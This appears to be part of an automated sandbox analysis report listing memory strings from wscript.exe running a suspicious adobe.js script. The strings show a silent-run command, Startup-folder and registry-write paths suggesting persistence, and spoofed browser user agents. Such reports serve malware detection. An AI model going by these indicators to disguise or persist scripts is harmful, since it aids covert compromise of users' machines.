                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jsmemstr_5c637ca7-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\ondemandconnroutehelper.dllxmemstr_2fc3c73b-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: js_szmemstr_27d62e33-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: adobeathsqmemstr_169525ba-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: adobeell3kmemstr_c4994c22-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: common startuphmemstr_ec83464d-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: adobeesp_memstr_4adf02a7-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\userp_memstr_3e337251-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: egreadl38memstr_913014d8-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: adobe.js7memstr_bbf85663-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 15hoodsmemstr_22ea8636-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progrmemstr_e8ff0a9c-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program@memstr_eac790d4-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indowsmemstr_1229041e-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indows@memstr_09832748-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupmemstr_7a155e3e-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startuphmemstr_6551acd4-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startup@shell32.dll,-21787memstr_05455745-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $\rmiomemstr_dc7ecdd6-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sers\jon`#8memstr_66e8a516-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jschine\software\adobe\".memstr_2321f2d9-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\windows\start menu\programs\startup\desktop.inimemstr_1b7e37ba-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: invalid root in registry key "hkey_local_machine\software\adobe\".memstr_d4b3578e-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\printer shortcutsmemstr_a183a61a-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jsal\temp\adobe(memstr_5e6eb6e8-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sers\jon@"8memstr_66375936-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jsmemstr_4e941cd5-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jsal\temp\adobememstr_60c992c8-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jc:\windows\system32\wbem\wbemdisp.tlbmemstr_1f50c967-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \windows\printermemstr_5f6924b1-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"kmemstr_31f754a7-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \rxwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"ssesamemstr_ac4af16e-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $]rmicmemstr_0a36fcb4-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"programsmemstr_a0e86b37-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\desktop.ini;memstr_b6807b51-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"tcuts1memstr_86d80e63-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programsmemstr_c0456120-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %utc:\users\user\appdata\local\temp\adobe.jstar menu\pmemstr_625355d3-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: roftmemstr_f66c286c-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\network shortcutsmemstr_efcd9c9f-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~1gzetmemstr_467e82c0-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktop@shell32.dll,-21769memstr_d8a4b684-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: micros~1memstr_0f288a23-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: micros~1dmemstr_630b795f-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pr1microsoftmemstr_fee02dc7-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v1gzctmemstr_5b2295d6-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cwindowsmemstr_df668f9a-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: printe~1memstr_40c41996-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: printe~1tmemstr_2dd34b7a-b
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: printer shortcuts
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: templa~1
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: templa~1d
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: networ~1
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: networ~1t
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: network shortcuts
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startm~1
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startm~1n
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [localizedfilenames
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: onedrive.lnkonedrive
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21782
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: immersive control panel.lnk@%systemroot%\immersivecontrolpanel\systemsettings.exe,-650
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: progra~3hu
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shell3
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: cros~1
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: cros~1di
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rogram
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: start menu@shell32.dll,-2
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\documents.
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "wshshell.regwritektopzmt.
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\ntmarta.dlll
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\favorites
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;?ones
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appda
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: favorites@shell32.dll,-21796
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1gzet
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: favori~1
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: favori~1l
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ^gzet.
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 202 (,
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 7t;h0h<
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 7$3t
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 0|2l#89
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: )\8t*
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: d7l4d=
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 8@1l$d=
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/4.0 (compatible; msie 8.0; windows phone os 7.5; trident/4.0; iemobile/8.0)
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/5.0 (compatible; msie 9.0; windows phone os 7.5; trident/5.0; iemobile/9.0)
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l|v0[
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rdj|i
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [|utz
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: z\fdkxia
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: elw`k
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [tqpy
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x@tx-<yds
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: j,x \
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: xdelz8&
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: uodw0w`x
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @ @!@"@#@$@%@&@'@(@)@*@+@,@-@.@/@0@1@2@3@4@5@6@7@8@9@:@;@<@=@>@?@@@a@b@c@d@e@f@g@h@i@j@k@l@m@n@o@p@q@r@s@t@u@v@w@x@y@z@[@\@]@^@_@`@a@b@c@d@e@f@g@h@i@j@k@l@m@n@o@p@q@r@s@t@u@v@w@x@y@z@{@|@}@~@
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/4.0 (compatible; msie 7.0; windows phone os 7.0; trident/3.1; iemobile/7.0)
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/4.0 (compatible; msie 7.0; windows phone os 7.0; trident/3.1; iemobile/7.0)t
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/5.0 (compatible; msie 10.0; windows phone 8.0; trident/6.0; iemobile/10.0; arm; touch)
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/5.0 (windows phone 8.1; arm; trident/8.0; touch; rv:11.0; iemobile/11.0) like gecko
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/5.0 (windows phone 8.1; arm; trident/8.0; touch; rv:11.0; iemobile/11.0) like gecko2
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/5.0 (windows phone 10.0; android 6.0.1) applewebkit/537.36 (khtml, like gecko) chrome/70.0.3538.102 mobile safari/537.36 edge/18.19045
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: t.@0n
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: center2m32\wbem\wbemdisp.tlbh
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $8l`t
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 0 t x
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: !0!p!p!
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "8"`"
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #@#l#
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $($h$l$
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %d%p%
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &,&l&t&
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: & 'p'p'
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: '( (@(l(
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ($)h)l)
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: *(*l*t*
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: +<+h+
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: +,0,x,
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fax recipient.lnk@%systemroot%\system32\fxsresm.dll,-120
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mail recipient.mapimail@sendmail.dll,-4
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: desktop (create shortcut).desklink@sendmail.dll,-21
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: compressed (zipped) folder.zfsendtotarget@zipfldr.dll,-10148
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: documents.mydocs@shell32.dll,-34575
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bluetooth file transfer.lnk@c:\windows\system32\fsquirt.exe,-2343
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: t1cw+^
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sendto
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sendto>
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: kzsendto
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: t1gzet
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: recent>
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gzctgzet.
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gzctgzet.(
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: programsj
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startuph
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startup@shell32.dll,-21787
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 'n3405117-
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{0e5aae11-a475-4c5b-ab00-c66de400274e}b00`a
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{0e5aae11-a475-4c5b-ab00-c66de400274e}b00
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: roami
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: js_szss
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: eg_sze3
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: usersfilesfolder
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 2025adobepr1m
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: adobe
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: errornts^
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: typeerroritem
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: adober
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @shell32,dll,-12692q
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{4590f811-1d3a-11d0-891f-00aa004b2e24}w
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: nes@a
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{172bddf8-ceea-11d1-8b05-00600806d9b6}e
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{4590f811-1d3a-11d0-891f-00aa004b2e24}e
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{172bddf8-ceea-11d1-8b05-00600806d9b6}pr
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}pr1mps
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: windo`e
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @tzres.dll,-112x
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: eastern standard time %
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @tzres.dll,-111
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: eastern summer time
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dllwb
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemprox.dlll
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemdisp.dllrosoft
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemdisp.dlll
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemdisp.dll0v
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: k.$xd
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wmiutils.dlll
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wmiutils.dllr
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wmiutils.dlll\jon
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemprox.dlll782
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: security=impersonation dynamic falsen\j
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ppdao
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemprox.dlll@
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \device\harddiskvolume3w
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: /c:\k
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemsvc.dlll
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: windows management and instrumentation
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \jon;
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemdisp.dlllc:
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: thoodell32
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ,-21786
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ,dmi
